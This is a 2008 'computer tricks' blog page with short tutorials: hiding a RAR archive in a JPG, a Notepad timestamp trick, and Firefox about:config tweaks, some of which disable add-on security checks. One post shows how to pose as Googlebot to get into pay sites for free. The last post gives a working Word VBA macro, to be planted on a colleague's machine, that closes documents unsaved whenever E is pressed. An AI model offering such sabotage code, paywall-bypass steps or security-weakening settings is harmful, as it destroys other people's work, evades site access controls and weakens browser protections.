play favourite mp3 songs in GTA vice city

Creating Custom Sprays in Counter strike cs 1.6

How to increase internet speed

How To Create Google Chrome Themes Skins Templates

[TIP]Recovering Scratched CD’s

Add item to right click

autochk not found

Speed up computer

Posted in internet tricks | Tagged: , | Leave a Comment »

Encrypt a text file in a JPG file

Posted by cracksandhacks on September 12, 2008

Here is a tutorial on how to hide files in Jpg’s. Please note it isn’t the most secure method, because the information is stored in plain text but it’s still cool to play with. A simple solution to make this more secure, is to use encryption on the RAR file when your create it, but thats not the point of this tutorial The idea is to show how files can be ’slammed’ together, to stop the average PC user from finding them.

Step by Step Instructions
You will need the following..

-Windows 2000 / XP (probably Vista, too!)
-Basic Knowledge of the Command Prompt
-WinRar

1. Gather your jpg file and the text files you wish to lodge into it. Here I have a black.txt which which I will slap inside my rider.jpg

2. Add both these files into a new RAR archive.Here the archive is black.rar

3. Open Command Prompt.

4. Go to the folder where your files are located, in this case ‘C:\hidden’

5. Type copy /b rider.jpg + black.rar blackrider.jpg where rider.jpg is the original picture, black.rar is the file to be hidden, and blackrider.jpg is the file which contains both.

6. Test the resulted JPG by opening it with winrar!

7. Enjoy the trick

8. Here is the image I created when making this tutorial! (Obviously rider.jpg and blackrider.jpg are the same image.)





Cool Computer Tricks

how to Remove amvo.exe

auto play virus solution

How to remove ntdetec1.exe file virus

Orkut tools hack pack

Restrict You pc shutdown

Mobile Bluetooth hacking

Shut Down Pc’s at school

play favourite mp3 songs in GTA vice city

Creating Custom Sprays in Counter strike cs 1.6

How to increase internet speed

How To Create Google Chrome Themes Skins Templates

[TIP]Recovering Scratched CD’s

Add item to right click

autochk not found

Speed up computer

Posted in computer tricks, hacking | Tagged: | Leave a Comment »

Make Your Notepad a Diary

Posted by cracksandhacks on September 12, 2008

A very simple trick

Sometimes we want to insert current data and time, whenever we open the file in the notepad.

it can be done by just pressing “F5″ key

If you are a lazy person like me, who don’t like to press F5 whenever you open a notepad. Then here is a trick to avoid this.

Just add a .LOG in the first line of your text file and close it.

Whenever you open the file with that text in the first line in the notepad, it will insert the current date and time at the end of the file. You can start entering your text after that.

Cool Computer Tricks

how to Remove amvo.exe

auto play virus solution

How to remove ntdetec1.exe file virus

Orkut tools hack pack

Restrict You pc shutdown

Mobile Bluetooth hacking

Shut Down Pc’s at school

play favourite mp3 songs in GTA vice city

Creating Custom Sprays in Counter strike cs 1.6

How to increase internet speed

How To Create Google Chrome Themes Skins Templates

[TIP]Recovering Scratched CD’s

Add item to right click

autochk not found

Speed up computer

Posted in computer tricks | Tagged: | Leave a Comment »

Mozilla Firefox useful tweaks [ff3 and older versions]

Posted by cracksandhacks on September 12, 2008

To get the Firefox 3 configuration file type “about:config” at address bar.

config hacks

Here is List of about:config hacks for Firefox 3

1) Disable Extension Compatibility Checks
extensions.checkCompatibility = False
extensions.checkUpdateSecurity = False

2) Location Bar (Set number Auto Complete URL at Address Bar)

This is a good hack to trim down that huge auto-complete list on your URL bar. By default it displays maximum 12 URL

browser.urlbar.maxRichResults = #

Enter Number at # (3,10,12 etc)

3) Stop Displaying Website Icon (Favicon) in Address bar & On Tab

browser.chrome.site_icons = False

4) Disable Prefetch (Helpful for frequent Google searcher, low-speed internet connection or low RAM)

network.prefetch-next = False

5) Extend Spell check to forms

layout.spellcheckDefault = 2
Change Value from 1 to 2

6) Disable Blinking Text

browser.blink_allowed = False

7) Speed Tweaks

network.http.pipelining false to true
network.http.pipelining.maxrequests 30 to 8
network.http.max-connections 30 to 96
network.http.max-connections-per-server 15 to 32
network.http.max-persistent-connections-per-server 6 to 8
network.http.pipelining.ssl false to true
network.http.proxy.pipelining false to true

8 ) Disable Annoying Browser Behavior

dom.disable_window_open_feature.menubar
dom.disable_window_move_resize
dom.disable_window_open_feature.titlebar
dom.disable_window_open_feature.toolbar

Set all of above to value False

9) Remove Tab Close Button from all Tab and set A single Close Button at Right

Remove Tab Close Button

Remove Tab Close Button

browser.tabs.closeButtons = 3

Single Close Button to control all Firefox Opened Tabs. (value should be 3 and not 2 Thanks Andreas )

10) Disabler Browser Toolbar Tip

browser.chrome.toolbar_tips = False

11) Show More Tabs on Single Firefox Window before Scrolling

browser.tabs.tabMinWidth = 75

Setting lesser value with reduce Tab width

12) Past Copy Content with Middlemouse Click

middlemouse.paste = True

13) Scroll webpage in One Go

mousewheel.withaltkey.action=1

14) Disable Delay Time While Installing Firefox Add-on

security.dialog_enable_delay = 0

(Zero is number of seconds Firefox should wait while installing Add-on)

15) Increase History Undo Close Tab Limit ( Recently Closed Tabs )

Increase History Undo Close Tab Limit

browser.sessionstore.max_tabs_undo=15

By default you can undo 10 recently closed tabs inorder to increase your history closed tabs. Change number 13 to as per your choice.

16) Open Firefox Default Search Bar Result in New Tab

browser.search.openintab=True

17) Right Click View Source in Your Favorite Editor

view_source.editor.external=True
view_source.editor.path= Path of Editor

(e.g. path C:\Program Files\npp.4.8.2.bin\notepad++.exe)

18) Enable/Disable Single Click to Select Whole URL in Address bar

Single Click Select URL Select

To Enable Single Click Select URL of address bar use the below about:config Tweak

browser.urlbar.clickSelectsAll = True

To disable Single Click Select

browser.urlbar.clickSelectsAll = False

19) Emule/ed2k link association (Linux users)

network.protocol-handler.app.ed2k= /usr/bin/ed2k
network.protocol-handler.external.ed2k = true

20) Fast Scrolling Across Tabs

Fast Scrolling Across tabs

toolkit.scrollbox.scrollIncrement =75

( 75 is number of pixels to scroll at a time when scrolling the tab strip’s scrollbox. (Default: 20)

21) Auto Complete URL while You type at address Bar

Auto Complete URL

browser.urlbar.autoFill=True

Many of above about:config hacks are available in Older Firefox Version, at the end if some thing goes wrong then feel free to restore your about:config to older setting see the below image of how to restore about:config

config

Hope you guys like this Firefox 3 hacks, If you have any tips or hacks related to Firefox 3 about:config, hacks, tweaks do let me know I will include it in above list.

Cool Computer Tricks

how to Remove amvo.exe

auto play virus solution

How to remove ntdetec1.exe file virus

Orkut tools hack pack

Restrict You pc shutdown

Mobile Bluetooth hacking

Shut Down Pc’s at school

play favourite mp3 songs in GTA vice city

Creating Custom Sprays in Counter strike cs 1.6

How to increase internet speed

How To Create Google Chrome Themes Skins Templates

[TIP]Recovering Scratched CD’s

Add item to right click

Speed up computer

autochk not found

Posted in computer tricks, internet tricks | Tagged: , , | Leave a Comment »

Get into pay sites for free as a Googlebot

Posted by cracksandhacks on September 12, 2008

Ever wondered why Google returned search results that lead to sites that require a registration? How did Google index the site without a registration? Many sites want their site indexed in Google to receive more hits, so they allow Googlebots in. Because of this reason we can take advantage of this. All we have to do is disguise ourself as a Googlebot and many sites will let us in without registration.

To do this we have to change the User Agent. The user agent defines the browser and what version you are using. For example if you go to this site it will tell you what browser you are using, and it finds this info out by the user agent.

Changing the user agent is easy, to do this in Opera you have to uses these settings:

User Agent: Googlebot/2.1 Compatible: http://www.googlebot.com/bot.html

Firefox users can use this extension and import this file (right click and save) that has a huge list of user agent settings including Googlebot/2.1 and many other spiders/bots.

Internet Explorer users you will need to change the registry entries, to do this open notepad and copy this into it:

    Windows Registry Editor Version 5.00 [HKEYLOCALMACHINESOFTWAREMicrosoftWindowsCurrentVersionInternet Settings5.0User Agent] @=”Googlebot/2.1″ “Compatible”=”+http://www.googlebot.com/bot.html”

Then save it as ua.reg and double click on it.

To revert the changes back, you will need to do the same but this time copy this in:

    Windows Registry Editor Version 5.00 [HKEYLOCALMACHINESOFTWAREMicrosoftWindowsCurrentVersionInternet Settings5.0User Agent] @=”Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”

Save as oua.reg and double click.

To see if it has worked go here and your browser should now be Googlebot v2.1

Enjoy!

Cool Computer Tricks

how to Remove amvo.exe

auto play virus solution

How to remove ntdetec1.exe file virus

Orkut tools hack pack

Restrict You pc shutdown

Mobile Bluetooth hacking

Shut Down Pc’s at school

play favourite mp3 songs in GTA vice city

Creating Custom Sprays in Counter strike cs 1.6

How to increase internet speed

How To Create Google Chrome Themes Skins Templates

[TIP]Recovering Scratched CD’s

Add item to right click

autochk not found

Speed up computer

Posted in internet tricks | Tagged: , | Leave a Comment »

Microsoft Word Prank

Posted by cracksandhacks on September 12, 2008

What is the most common letter in the English language? E right? Well, what would you do if every time you typed “E” in Microsoft Word, it closed your word document and didn’t save any of your work. Well you might throw your computer out the window and kill who ever did it to you. This computer prank will drive your office friends crazy. So hell lets do it right?

Step 1: Open up Micro Soft Word

Step2: Press alt F11, this will open up a vba editor for word.

Step3: In project window on the left there should be a title “Normal” this is your default template. Select the default document underneath it.

Step4: Copy and past this code into the document
Sub AddKeyBinding()
CustomizationContext = NormalTemplate
KeyBindings.Add KeyCode:=BuildKeyCode(wdKeyE), KeyCategory:=wdKeyCategoryCommand, _
Command:="TestKeybinding"
End Sub
Sub TestKeybinding()
Dim x As Document
Set x = ActiveDocument
x.Close (False)
End Sub

Step5: Close word

Step6: Enjoy

If you did this correctly the next time they load word this code will be loaded. What it will do is every time the key “E” is pressed, it will close the document and NOT SAVE. You can change the key to anything you like and below I have listed some different key options. Have fun and unleash hell.

Key Options

To change the key from E to something else replace this piece of the code in bold

.KeyBindings.Add KeyCode:=BuildKeyCode(wdKeyE)

If you want to use a different letter it is: wdKeyYOURLETTER

If you want to use a key other than a letter or a number, it usualy is the keys name.
Example: wdKeyBackspace

Try out different options, its a lot of fun.

Cool Computer Tricks

how to Remove amvo.exe

auto play virus solution

How to remove ntdetec1.exe file virus

Orkut tools hack pack

Restrict You pc shutdown

Mobile Bluetooth hacking

Shut Down Pc’s at school

play favourite mp3 songs in GTA vice city

Creating Custom Sprays in Counter strike cs 1.6

How to increase internet speed

How To Create Google Chrome Themes Skins Templates

[TIP]Recovering Scratched CD’s

autochk not found

Speed up computer

Posted in computer tricks, hacking | Tagged: , , , | Leave a Comment »